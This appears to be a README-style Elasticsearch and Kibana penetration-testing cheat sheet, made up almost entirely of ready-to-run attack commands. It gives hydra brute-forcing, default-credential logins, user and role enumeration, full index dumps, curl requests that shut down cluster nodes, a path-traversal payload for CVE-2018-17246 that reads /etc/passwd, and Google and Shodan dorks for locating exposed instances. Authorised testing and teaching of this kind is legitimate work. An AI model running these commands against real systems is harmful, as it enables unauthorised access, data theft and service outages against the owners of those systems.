ElasticSearch-Pentesting
ElasticSearch-Pentesting copied to clipboard
ElasticSearch exploit and Pentesting guide for penetration tester
ElasticSearch Pentesting
ElasticSearch exploit and Pentesting guide for penetration tester
What is an Elasticsearch index?
An Elasticsearch index is a collection of documents that are related to each other. Elasticsearch stores data as JSON documents
Brute Force Credentials
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /
Default credentials
curl -X GET http://admin:elasticadmin@target:9200/
curl -X GET http://elastic:changeme@target:9200/
Basic User Enumeration
## List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"
#List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
#Get more information about the rights of an user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
Elastic Info
curl -X GET http://target:9200/_cat/
curl -X GET http://target:9200/_cluster/
curl -X GET http://target:9200/_nodes/
curl -X GET http://target:9200/_remote/
curl -X GET http://target:9200/_security/
List All indexes
http://target:9200/_cat/indices?v&s=docs.count
Dump index
http://target:9200/<index>/_search?pretty=true&size=100
http://target:9200/bank/_search?pretty=true
Dump all
http://target:9200/_search?pretty=true
search
http://target:9200/_search?pretty=true&q=<search_term>
http://target:9200/<index>/_search?pretty=true&q=<search_term>
Shutting Down Nodes
curl -X POST http://target:9200/_shutdown
curl -X POST http://target:9200/_cluster/nodes/_master/_shutdown
Elastic Search Kibana Console LFI (CVE-2018-17246)
http://target:9200/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
Google Dorks to find Kibana Instances
inurl:app/kibana
inurl:app/kibana intext:Loading Kibana
inurl::5601/app/kibana
Shodan Dorks to finding Kibana Instances
port:9200 elasticsearch
Dork: title:"kibana" port:"443"
Dork: kibana content-length: 217